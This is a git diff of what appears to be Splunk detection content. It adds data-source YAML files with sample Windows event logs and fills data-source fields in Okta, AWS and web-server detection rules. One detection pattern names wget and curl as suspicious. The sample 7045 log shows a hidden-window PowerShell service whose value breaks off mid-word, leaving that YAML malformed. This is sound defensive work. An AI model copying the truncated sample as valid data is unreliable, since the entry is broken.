diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_System_4726.yml b/data_sources/windows_event_log_system_4726.yml
similarity index 74%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_System_4726.yml
rename to data_sources/windows_event_log_system_4726.yml
index c98068190f..8e6fcf020f 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_System_4726.yml
+++ b/data_sources/windows_event_log_system_4726.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log System 4726
+name: Windows Event Log System 4726
+id: 05e6b2df-b50e-441b-8ac8-565f2e80d62f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log System 4726
+source: XmlWinEventLog:System
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
 fields:
 - _time
 - Account_Domain
diff --git a/data_sources/windows_event_log_system_7036.yml b/data_sources/windows_event_log_system_7036.yml
new file mode 100644
index 0000000000..0dac45adea
--- /dev/null
+++ b/data_sources/windows_event_log_system_7036.yml
@@ -0,0 +1,76 @@
+name: Windows Event Log System 7036
+id: a6e9b34f-1507-4fa1-a4ba-684d1b676a34
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log System 7036
+source: XmlWinEventLog:System
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventRecordID
+- EventSourceName
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- Qualifiers
+- RecordNumber
+- ServiceName
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- param1
+- param2
+- product
+- punct
+- service
+- service_name
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Service Control Manager' Guid='{555908d1-a6d7-4695-8e1e-26931d2012f4}' EventSourceName='Service
+  Control Manager'/><EventID Qualifiers='16384'>7036</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8080000000000000</Keywords><TimeCreated
+  SystemTime='2024-03-11T01:38:35.892897800Z'/><EventRecordID>168530</EventRecordID><Correlation/><Execution
+  ProcessID='588' ThreadID='2272'/><Channel>System</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data
+  Name='param1'>sppsvc</Data><Data Name='param2'>stopped</Data><Binary>7300700070007300760063002F0031000000</Binary></EventData></Event>
diff --git a/data_sources/windows_event_log_system_7040.yml b/data_sources/windows_event_log_system_7040.yml
new file mode 100644
index 0000000000..3cdcf9d06b
--- /dev/null
+++ b/data_sources/windows_event_log_system_7040.yml
@@ -0,0 +1,82 @@
+name: Windows Event Log System 7040
+id: 91738e9e-d112-41c9-b91b-e5868d8993d9
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log System 7040
+source: XmlWinEventLog:System
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventRecordID
+- EventSourceName
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- Qualifiers
+- RecordNumber
+- ServiceName
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserID
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- param1
+- param2
+- param3
+- param4
+- product
+- punct
+- service
+- service_name
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- start_mode
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Service Control Manager' Guid='{555908d1-a6d7-4695-8e1e-26931d2012f4}' EventSourceName='Service
+  Control Manager'/><EventID Qualifiers='16384'>7040</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8080000000000000</Keywords><TimeCreated
+  SystemTime='2024-03-05T08:53:41.173068700Z'/><EventRecordID>168231</EventRecordID><Correlation/><Execution
+  ProcessID='592' ThreadID='3404'/><Channel>System</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security
+  UserID='S-1-5-21-3344543075-1022232225-2459664213-500'/></System><EventData><Data
+  Name='param1'>Print Spooler</Data><Data Name='param2'>demand start</Data><Data Name='param3'>disabled</Data><Data
+  Name='param4'>Spooler</Data></EventData></Event>
diff --git a/data_sources/windows_event_log_system_7045.yml b/data_sources/windows_event_log_system_7045.yml
new file mode 100644
index 0000000000..d515b774eb
--- /dev/null
+++ b/data_sources/windows_event_log_system_7045.yml
@@ -0,0 +1,82 @@
+name: Windows Event Log System 7045
+id: 614dedc8-8a14-4393-ba9b-6f093cbcd293
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log System 7045
+source: XmlWinEventLog:System
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- AccountName
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventRecordID
+- EventSourceName
+- Guid
+- ImagePath
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- Qualifiers
+- RecordNumber
+- ServiceName
+- ServiceType
+- StartType
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserID
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- product
+- punct
+- service
+- service_name
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- start_mode
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Service Control Manager' Guid='{555908d1-a6d7-4695-8e1e-26931d2012f4}' EventSourceName='Service
+  Control Manager'/><EventID Qualifiers='16384'>7045</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8080000000000000</Keywords><TimeCreated
+  SystemTime='2024-03-04T10:11:25.483986000Z'/><EventRecordID>168145</EventRecordID><Correlation/><Execution
+  ProcessID='592' ThreadID='1712'/><Channel>System</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security
+  UserID='S-1-5-21-3344543075-1022232225-2459664213-500'/></System><EventData><Data
+  Name='ServiceName'>KrbSCM</Data><Data Name='ImagePath'>powershell.exe -WindowStyle
+  Hiddenestno'
diff --git a/data_sources/windows_event_log_taskscheduler_200.yml b/data_sources/windows_event_log_taskscheduler_200.yml
new file mode 100644
index 0000000000..f08316f364
--- /dev/null
+++ b/data_sources/windows_event_log_taskscheduler_200.yml
@@ -0,0 +1,80 @@
+name: Windows Event Log TaskScheduler 200
+id: f8c777f8-e88a-4bba-ae8a-79b250212f23
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log TaskScheduler 200
+source: WinEventLog:Microsoft-Windows-TaskScheduler/Operational
+sourcetype: wineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ActionName
+- ActivityID
+- Channel
+- Computer
+- EnginePID
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SystemTime
+- System_Props_Xml
+- Task
+- TaskInstanceId
+- TaskName
+- ThreadID
+- UserID
+- Version
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- product
+- punct
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- ta_windows_action
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-TaskScheduler' Guid='{DE7B24EA-73C8-4A09-985D-5BDADCFA9017}'/><EventID>200</EventID><Version>1</Version><Level>4</Level><Task>200</Task><Opcode>1</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2024-03-04T03:52:18.856458200Z'/><EventRecordID>4323</EventRecordID><Correlation
+  ActivityID='{2EE32989-FAF3-4BA3-9FB9-DB0080598F68}'/><Execution ProcessID='988'
+  ThreadID='4524'/><Channel>Microsoft-Windows-TaskScheduler/Operational</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData Name='ActionStart'><Data Name='TaskName'>\OneLinerTestTask3</Data><Data
+  Name='ActionName'>notepad.exe</Data><Data Name='TaskInstanceId'>{2EE32989-FAF3-4BA3-9FB9-DB0080598F68}</Data><Data
+  Name='EnginePID'>536</Data></EventData></Event>
diff --git a/data_sources/endpoint/Windows_IIS.yml b/data_sources/windows_iis.yml
similarity index 53%
rename from data_sources/endpoint/Windows_IIS.yml
rename to data_sources/windows_iis.yml
index 3e44049c44..75fd6472f6 100644
--- a/data_sources/endpoint/Windows_IIS.yml
+++ b/data_sources/windows_iis.yml
@@ -1,13 +1,13 @@
 name: Windows IIS
-id: 6c34ec24-1cba-4847-b035-4363ff04fd47
+id: 469335b3-b6ad-49e2-bbe6-47e15c1464a7
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for Windows IIS
 source: IIS:Configuration:Operational
 sourcetype: IIS:Configuration:Operational
 separator: EventID
 supported_TA:
-  name: Splunk Add-on for Microsoft Windows
-  version: 8.8.0
+- name: Splunk Add-on for Microsoft Windows
   url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows IIS 29
-  data_source: data_sources/endpoint/event_sources/Windows_IIS_29.yml
+  version: 8.8.0
diff --git a/data_sources/windows_iis_29.yml b/data_sources/windows_iis_29.yml
new file mode 100644
index 0000000000..c2ae08d1c0
--- /dev/null
+++ b/data_sources/windows_iis_29.yml
@@ -0,0 +1,31 @@
+name: Windows IIS 29
+id: 1d99ddd7-7fec-4dea-bf4f-1f4906142328
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows IIS 29
+source: IIS:Configuration:Operational
+sourcetype: IIS:Configuration:Operational
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+  url: https://splunkbase.splunk.com/app/742
+  version: 8.8.0
+fields:
+- _time
+- ComputerName
+- EventCode
+- EventType
+- Keywords
+- LogName
+- Message
+- OpCode
+- RecordNumber
+- Sid
+- SidType
+- SourceName
+- TaskCategory
+- Type
+- User
+- name
+example_log: ''
diff --git a/detections/application/crushftp_server_side_template_injection.yml b/detections/application/crushftp_server_side_template_injection.yml
index 71c70e6b6c..6794bec15a 100644
--- a/detections/application/crushftp_server_side_template_injection.yml
+++ b/detections/application/crushftp_server_side_template_injection.yml
@@ -3,7 +3,8 @@ id: ccf6b7a3-bd39-4bc9-a949-143a8d640dbc
 version: 1
 date: '2024-05-16'
 author: Michael Haag, Splunk
-data_source: []
+data_source: 
+- CrushFTP
 type: TTP
 status: production
 description: This analytic is designed to identify attempts to exploit a server-side template injection vulnerability in CrushFTP, designated as CVE-2024-4040. This severe vulnerability enables unauthenticated remote attackers to access and read files beyond the VFS Sandbox, circumvent authentication protocols, and execute arbitrary commands on the affected server. The issue impacts all versions of CrushFTP up to 10.7.1 and 11.1.0 on all supported platforms. It is highly recommended to apply patches immediately to prevent unauthorized access to the system and avoid potential data compromises. The search specifically looks for patterns in the raw log data that match the exploitation attempts, including READ or WRITE actions, and extracts relevant information such as the protocol, session ID, user, IP address, HTTP method, and the URI queried. It then evaluates these logs to confirm traces of exploitation based on the presence of specific keywords and the originating IP address, counting and sorting these events for further analysis.
diff --git a/detections/application/email_files_written_outside_of_the_outlook_directory.yml b/detections/application/email_files_written_outside_of_the_outlook_directory.yml
index 7360aadcfb..f37061e330 100644
--- a/detections/application/email_files_written_outside_of_the_outlook_directory.yml
+++ b/detections/application/email_files_written_outside_of_the_outlook_directory.yml
@@ -14,7 +14,7 @@ description: The following analytic detects email files (.pst or .ost) being cre
   sensitive email content, leading to data breaches or further exploitation within
   the network.
 data_source:
-- Sysmon Event ID 11
+- Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count values(Filesystem.file_path)
   as file_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem
   where (Filesystem.file_name=*.pst OR Filesystem.file_name=*.ost) Filesystem.file_path
diff --git a/detections/application/okta_authentication_failed_during_mfa_challenge.yml b/detections/application/okta_authentication_failed_during_mfa_challenge.yml
index 6ed2871746..489b0178cb 100644
--- a/detections/application/okta_authentication_failed_during_mfa_challenge.yml
+++ b/detections/application/okta_authentication_failed_during_mfa_challenge.yml
@@ -3,7 +3,8 @@ id: e2b99e7d-d956-411a-a120-2b14adfdde93
 version: 2
 date: '2024-05-29'
 author: Bhavin Patel, Splunk
-data_source: []
+data_source: 
+- Okta
 type: TTP
 status: production
 description: The following analytic identifies failed authentication attempts during
diff --git a/detections/application/okta_idp_lifecycle_modifications.yml b/detections/application/okta_idp_lifecycle_modifications.yml
index c59a210bbb..a9052093c0 100644
--- a/detections/application/okta_idp_lifecycle_modifications.yml
+++ b/detections/application/okta_idp_lifecycle_modifications.yml
@@ -3,7 +3,8 @@ id: e0be2c83-5526-4219-a14f-c3db2e763d15
 version: 2
 date: '2024-05-28'
 author: Bhavin Patel, Splunk
-data_source: []
+data_source: 
+- Okta
 type: Anomaly
 status: production
 description: The following analytic identifies modifications to Okta Identity Provider
diff --git a/detections/application/okta_mfa_exhaustion_hunt.yml b/detections/application/okta_mfa_exhaustion_hunt.yml
index 591a9b5231..e17f3aee26 100644
--- a/detections/application/okta_mfa_exhaustion_hunt.yml
+++ b/detections/application/okta_mfa_exhaustion_hunt.yml
@@ -12,7 +12,8 @@ description: The following analytic detects patterns of successful and failed Ok
   may indicate an attacker attempting to bypass MFA by overwhelming the user with
   push notifications. If confirmed malicious, this could lead to unauthorized access,
   compromising the security of the affected accounts and potentially the entire environment.
-data_source: []
+data_source: 
+- Okta
 search: '`okta` eventType=system.push.send_factor_verify_push OR ((legacyEventType=core.user.factor.attempt_success)
   AND (debugContext.debugData.factor=OKTA_VERIFY_PUSH)) OR ((legacyEventType=core.user.factor.attempt_fail)
   AND (debugContext.debugData.factor=OKTA_VERIFY_PUSH)) | stats count(eval(legacyEventType="core.user.factor.attempt_success"))  as
diff --git a/detections/application/okta_mismatch_between_source_and_response_for_verify_push_request.yml b/detections/application/okta_mismatch_between_source_and_response_for_verify_push_request.yml
index 41b874c8bc..03a6a1aa0e 100644
--- a/detections/application/okta_mismatch_between_source_and_response_for_verify_push_request.yml
+++ b/detections/application/okta_mismatch_between_source_and_response_for_verify_push_request.yml
@@ -5,7 +5,8 @@ date: '2024-05-19'
 author: John Murphy and Jordan Ruocco, Okta, Michael Haag, Splunk
 type: TTP
 status: experimental
-data_source: []
+data_source: 
+- Okta
 description: 'The following analytic identifies discrepancies between the source and
   response events for Okta Verify Push requests, indicating potential suspicious behavior.
   It leverages Okta System Log events, specifically `system.push.send_factor_verify_push`
diff --git a/detections/application/okta_multi_factor_authentication_disabled.yml b/detections/application/okta_multi_factor_authentication_disabled.yml
index 4f3d2badc0..478f4dbbac 100644
--- a/detections/application/okta_multi_factor_authentication_disabled.yml
+++ b/detections/application/okta_multi_factor_authentication_disabled.yml
@@ -3,7 +3,8 @@ id: 7c0348ce-bdf9-45f6-8a57-c18b5976f00a
 version: 2
 date: '2024-05-13'
 author: Mauricio Velazco, Splunk
-data_source: []
+data_source: 
+- Okta
 type: TTP
 status: production
 description: The following analytic identifies an attempt to disable multi-factor
diff --git a/detections/application/okta_multiple_accounts_locked_out.yml b/detections/application/okta_multiple_accounts_locked_out.yml
index 7771f9cfa8..daf67758d4 100644
--- a/detections/application/okta_multiple_accounts_locked_out.yml
+++ b/detections/application/okta_multiple_accounts_locked_out.yml
@@ -3,7 +3,8 @@ id: a511426e-184f-4de6-8711-cfd2af29d1e1
 version: 2
 date: '2024-05-11'
 author: Michael Haag, Mauricio Velazco, Splunk
-data_source: []
+data_source: 
+- Okta
 type: Anomaly
 status: production
 description: The following analytic detects multiple Okta accounts being locked out
diff --git a/detections/application/okta_multiple_failed_mfa_requests_for_user.yml b/detections/application/okta_multiple_failed_mfa_requests_for_user.yml
index d0a539de30..bf761654d3 100644
--- a/detections/application/okta_multiple_failed_mfa_requests_for_user.yml
+++ b/detections/application/okta_multiple_failed_mfa_requests_for_user.yml
@@ -3,7 +3,8 @@ id: 826dbaae-a1e6-4c8c-b384-d16898956e73
 version: 2
 date: '2024-05-20'
 author: Mauricio Velazco, Splunk
-data_source: []
+data_source: 
+- Okta
 type: Anomaly
 status: production
 description: The following analytic identifies multiple failed multi-factor authentication
diff --git a/detections/application/okta_multiple_failed_requests_to_access_applications.yml b/detections/application/okta_multiple_failed_requests_to_access_applications.yml
index 56a07ee4db..2211b8fb5d 100644
--- a/detections/application/okta_multiple_failed_requests_to_access_applications.yml
+++ b/detections/application/okta_multiple_failed_requests_to_access_applications.yml
@@ -5,7 +5,8 @@ date: "2024-05-30"
 author: John Murphy, Okta, Michael Haag, Splunk
 type: Hunting
 status: experimental
-data_source: []
+data_source: 
+- Okta
 description: 'The following analytic detects multiple failed attempts to access applications
   in Okta, potentially indicating the reuse of a stolen web session cookie. It leverages
   Okta logs to evaluate policy and SSO events, aggregating data by user, session,
diff --git a/detections/application/okta_multiple_users_failing_to_authenticate_from_ip.yml b/detections/application/okta_multiple_users_failing_to_authenticate_from_ip.yml
index 6c457c5bd9..4f1af7ca0b 100644
--- a/detections/application/okta_multiple_users_failing_to_authenticate_from_ip.yml
+++ b/detections/application/okta_multiple_users_failing_to_authenticate_from_ip.yml
@@ -3,7 +3,8 @@ id: de365ffa-42f5-46b5-b43f-fa72290b8218
 version: 2
 date: '2024-05-28'
 author: Michael Haag, Mauricio Velazco, Splunk
-data_source: []
+data_source: 
+- Okta
 type: Anomaly
 status: production
 description: The following analytic identifies instances where more than 10 unique
diff --git a/detections/application/okta_new_api_token_created.yml b/detections/application/okta_new_api_token_created.yml
index 9d6a299dd2..4c4200cccb 100644
--- a/detections/application/okta_new_api_token_created.yml
+++ b/detections/application/okta_new_api_token_created.yml
@@ -13,7 +13,8 @@ description: The following analytic detects the creation of a new API token with
   persistence. If confirmed malicious, this could enable attackers to execute API
   calls, access sensitive data, and perform administrative actions within the Okta
   environment.
-data_source: []
+data_source: 
+- Okta
 search: ' | tstats `security_content_summariesonly` count max(_time) as lastTime,
   min(_time) as firstTime from datamodel=Change where All_Changes.action=created AND
   All_Changes.command=system.api_token.create by _time span=5m All_Changes.user All_Changes.result
diff --git a/detections/application/okta_new_device_enrolled_on_account.yml b/detections/application/okta_new_device_enrolled_on_account.yml
index 8d19286783..76288f15e1 100644
--- a/detections/application/okta_new_device_enrolled_on_account.yml
+++ b/detections/application/okta_new_device_enrolled_on_account.yml
@@ -13,7 +13,8 @@ description: The following analytic identifies when a new device is enrolled on
   to potential account takeover, unauthorized access, and persistent control over
   the compromised Okta account. Monitoring this behavior is crucial for detecting
   and mitigating unauthorized access attempts.
-data_source: []
+data_source: 
+- Okta
 search: ' | tstats `security_content_summariesonly` count max(_time) as lastTime,
   min(_time) as firstTime from datamodel=Change where All_Changes.action=created All_Changes.command=device.enrollment.create
   by _time span=5m All_Changes.user All_Changes.result All_Changes.command sourcetype
diff --git a/detections/application/okta_phishing_detection_with_fastpass_origin_check.yml b/detections/application/okta_phishing_detection_with_fastpass_origin_check.yml
index ee78e21364..8fad808cf6 100644
--- a/detections/application/okta_phishing_detection_with_fastpass_origin_check.yml
+++ b/detections/application/okta_phishing_detection_with_fastpass_origin_check.yml
@@ -5,7 +5,8 @@ date: '2024-05-15'
 author: Okta, Inc, Michael Haag, Splunk
 type: TTP
 status: experimental
-data_source: []
+data_source: 
+- Okta
 description: The following analytic identifies failed user authentication attempts
   in Okta due to FastPass declining a phishing attempt. It leverages Okta logs, specifically
   looking for events where multi-factor authentication (MFA) fails with the reason
diff --git a/detections/application/okta_risk_threshold_exceeded.yml b/detections/application/okta_risk_threshold_exceeded.yml
index 314de0f5d4..8a6cb4a408 100644
--- a/detections/application/okta_risk_threshold_exceeded.yml
+++ b/detections/application/okta_risk_threshold_exceeded.yml
@@ -13,7 +13,8 @@ description: The following correlation identifies when a user exceeds a risk thr
   tactics, techniques, and procedures (TTPs) within a 24-hour period. If confirmed
   malicious, this activity could indicate a serious security breach, allowing attackers
   to gain unauthorized access, escalate privileges, or persist within the environment.
-data_source: []
+data_source: 
+- Okta
 search: '| tstats `security_content_summariesonly` values(All_Risk.analyticstories)
   as analyticstories  sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score)
   as risk_event_count,values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as
diff --git a/detections/application/okta_successful_single_factor_authentication.yml b/detections/application/okta_successful_single_factor_authentication.yml
index 02d48dae21..85bf673cbe 100644
--- a/detections/application/okta_successful_single_factor_authentication.yml
+++ b/detections/application/okta_successful_single_factor_authentication.yml
@@ -3,7 +3,8 @@ id: 98f6ad4f-4325-4096-9d69-45dc8e638e82
 version: 2
 date: '2024-05-26'
 author: Bhavin Patel, Splunk
-data_source: []
+data_source: 
+- Okta
 type: Anomaly
 status: production
 description: The following analytic identifies successful single-factor authentication
diff --git a/detections/application/okta_suspicious_activity_reported.yml b/detections/application/okta_suspicious_activity_reported.yml
index 66a5b84607..447b104ac5 100644
--- a/detections/application/okta_suspicious_activity_reported.yml
+++ b/detections/application/okta_suspicious_activity_reported.yml
@@ -13,7 +13,8 @@ description: The following analytic identifies when an associate reports a login
   malicious, the attacker could gain unauthorized access to sensitive systems and
   data, leading to data theft, privilege escalation, or further compromise of the
   environment.
-data_source: []
+data_source: 
+- Okta
 search: '`okta` eventType=user.account.report_suspicious_activity_by_enduser | stats
   count min(_time) as firstTime max(_time) as lastTime values(displayMessage) by user
   eventType client.userAgent.rawUserAgent client.userAgent.browser client.geographicalContext.city  client.geographicalContext.country
diff --git a/detections/application/okta_suspicious_use_of_a_session_cookie.yml b/detections/application/okta_suspicious_use_of_a_session_cookie.yml
index 9e144bfc6e..769fd797ab 100644
--- a/detections/application/okta_suspicious_use_of_a_session_cookie.yml
+++ b/detections/application/okta_suspicious_use_of_a_session_cookie.yml
@@ -5,7 +5,8 @@ date: '2024-05-29'
 author: Scott Dermott, Felicity Robson, Okta, Michael Haag, Bhavin Patel, Splunk
 type: Anomaly
 status: production
-data_source: []
+data_source: 
+- Okta
 description: 'The following analytic identifies suspicious use of a session cookie
   by detecting multiple client values (IP, User Agent, etc.) changing for the same
   Device Token associated with a specific user. It leverages policy evaluation events
diff --git a/detections/application/okta_threatinsight_threat_detected.yml b/detections/application/okta_threatinsight_threat_detected.yml
index 77a959649f..510f83e8df 100644
--- a/detections/application/okta_threatinsight_threat_detected.yml
+++ b/detections/application/okta_threatinsight_threat_detected.yml
@@ -12,7 +12,8 @@ description: The following analytic identifies threats detected by Okta ThreatIn
   access attempts and credential-based attacks. If confirmed malicious, these activities
   could lead to unauthorized access, data breaches, and further exploitation of compromised
   accounts, posing a significant risk to the organization's security posture.
-data_source: []
+data_source: 
+- Okta
 search: '`okta` eventType = security.threat.detected | rename client.geographicalContext.country
   as country, client.geographicalContext.state as state, client.geographicalContext.city
   as city | stats count min(_time) as firstTime max(_time) as lastTime by app src_ip
diff --git a/detections/application/okta_unauthorized_access_to_application.yml b/detections/application/okta_unauthorized_access_to_application.yml
index 9f94ca1140..e7a0ad8897 100644
--- a/detections/application/okta_unauthorized_access_to_application.yml
+++ b/detections/application/okta_unauthorized_access_to_application.yml
@@ -3,7 +3,8 @@ id: 5f661629-9750-4cb9-897c-1f05d6db8727
 version: 2
 date: '2024-05-12'
 author: 'Bhavin Patel, Splunk'
-data_source: []
+data_source: 
+- Okta
 type: Anomaly
 status: production
 description: The following analytic identifies attempts by users to access Okta applications
diff --git a/detections/application/okta_user_logins_from_multiple_cities.yml b/detections/application/okta_user_logins_from_multiple_cities.yml
index adefdd2cae..9834d29bd2 100644
--- a/detections/application/okta_user_logins_from_multiple_cities.yml
+++ b/detections/application/okta_user_logins_from_multiple_cities.yml
@@ -3,7 +3,8 @@ id: a3d1df37-c2a9-41d0-aa8f-59f82d6192a8
 version: 2
 date: '2024-05-09'
 author: 'Bhavin Patel, Splunk'
-data_source: []
+data_source: 
+- Okta
 type: Anomaly
 status: production
 description: The following analytic identifies instances where the same Okta user
diff --git a/detections/application/web_servers_executing_suspicious_processes.yml b/detections/application/web_servers_executing_suspicious_processes.yml
index f9cd51422a..86b21aef43 100644
--- a/detections/application/web_servers_executing_suspicious_processes.yml
+++ b/detections/application/web_servers_executing_suspicious_processes.yml
@@ -8,7 +8,7 @@ type: TTP
 description: |-
   The following analytic detects the execution of suspicious processes on systems identified as web servers. It leverages the Splunk data model "Endpoint.Processes" to search for specific process names such as "whoami", "ping", "iptables", "wget", "service", and "curl". This activity is significant because these processes are often used by attackers for reconnaissance, persistence, or data exfiltration. If confirmed malicious, this could lead to data theft, deployment of additional malware, or even ransomware attacks. Immediate investigation is required to determine the legitimacy of the activity and mitigate potential threats.
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.dest_category="web_server"
   AND (Processes.process="*whoami*" OR Processes.process="*ping*" OR Processes.process="*iptables*"
diff --git a/detections/cloud/abnormally_high_number_of_cloud_infrastructure_api_calls.yml b/detections/cloud/abnormally_high_number_of_cloud_infrastructure_api_calls.yml
index 343122859f..23aa020d39 100644
--- a/detections/cloud/abnormally_high_number_of_cloud_infrastructure_api_calls.yml
+++ b/detections/cloud/abnormally_high_number_of_cloud_infrastructure_api_calls.yml
@@ -13,7 +13,8 @@ description: The following analytic detects a spike in the number of API calls m
   confirmed malicious, this could lead to unauthorized access, data exfiltration,
   or disruption of cloud services, posing a significant risk to the organization's
   cloud environment.
-data_source: []
+data_source: 
+- AWS CloudTrail
 search: '| tstats count as api_calls values(All_Changes.command) as command from datamodel=Change
   where All_Changes.user!=unknown All_Changes.status=success by All_Changes.user _time
   span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time,
diff --git a/detections/cloud/abnormally_high_number_of_cloud_instances_destroyed.yml b/detections/cloud/abnormally_high_number_of_cloud_instances_destroyed.yml
index aea878fa80..a7e7e2e048 100644
--- a/detections/cloud/abnormally_high_number_of_cloud_instances_destroyed.yml
+++ b/detections/cloud/abnormally_high_number_of_cloud_instances_destroyed.yml
@@ -13,7 +13,8 @@ description: The following analytic identifies an abnormally high number of clou
   to disrupt services. If confirmed malicious, this could lead to significant operational
   disruptions, data loss, and potential financial impact due to the destruction of
   critical cloud resources.
-data_source: []
+data_source: 
+- AWS CloudTrail
 search: '| tstats count as instances_destroyed values(All_Changes.object_id) as object_id
   from datamodel=Change where All_Changes.action=deleted AND All_Changes.status=success
   AND All_Changes.object_category=instance by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")`
diff --git a/detections/cloud/abnormally_high_number_of_cloud_instances_launched.yml b/detections/cloud/abnormally_high_number_of_cloud_instances_launched.yml
index 21ab397c4f..5dde904f38 100644
--- a/detections/cloud/abnormally_high_number_of_cloud_instances_launched.yml
+++ b/detections/cloud/abnormally_high_number_of_cloud_instances_launched.yml
@@ -12,7 +12,8 @@ description: The following analytic detects an abnormally high number of cloud i
   indicate unauthorized access or misuse of cloud resources. If confirmed malicious,
   this behavior could lead to resource exhaustion, increased costs, or provide attackers
   with additional compute resources to further their objectives.
-data_source: []
+data_source: 
+- AWS CloudTrail
 search: '| tstats count as instances_launched values(All_Changes.object_id) as object_id
   from datamodel=Change where (All_Changes.action=created) AND All_Changes.status=success
   AND All_Changes.object_category=instance by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")`
diff --git a/detections/cloud/aws_createloginprofile.yml b/detections/cloud/aws_createloginprofile.yml
index ab82917ec6..d63313a420 100644
--- a/detections/cloud/aws_createloginprofile.yml
+++ b/detections/cloud/aws_createloginprofile.yml
@@ -13,8 +13,7 @@ description: The following analytic identifies the creation of a login profile f
   to gain unauthorized access. If confirmed malicious, this could allow the attacker
   to escalate privileges and maintain persistent access to the AWS environment.
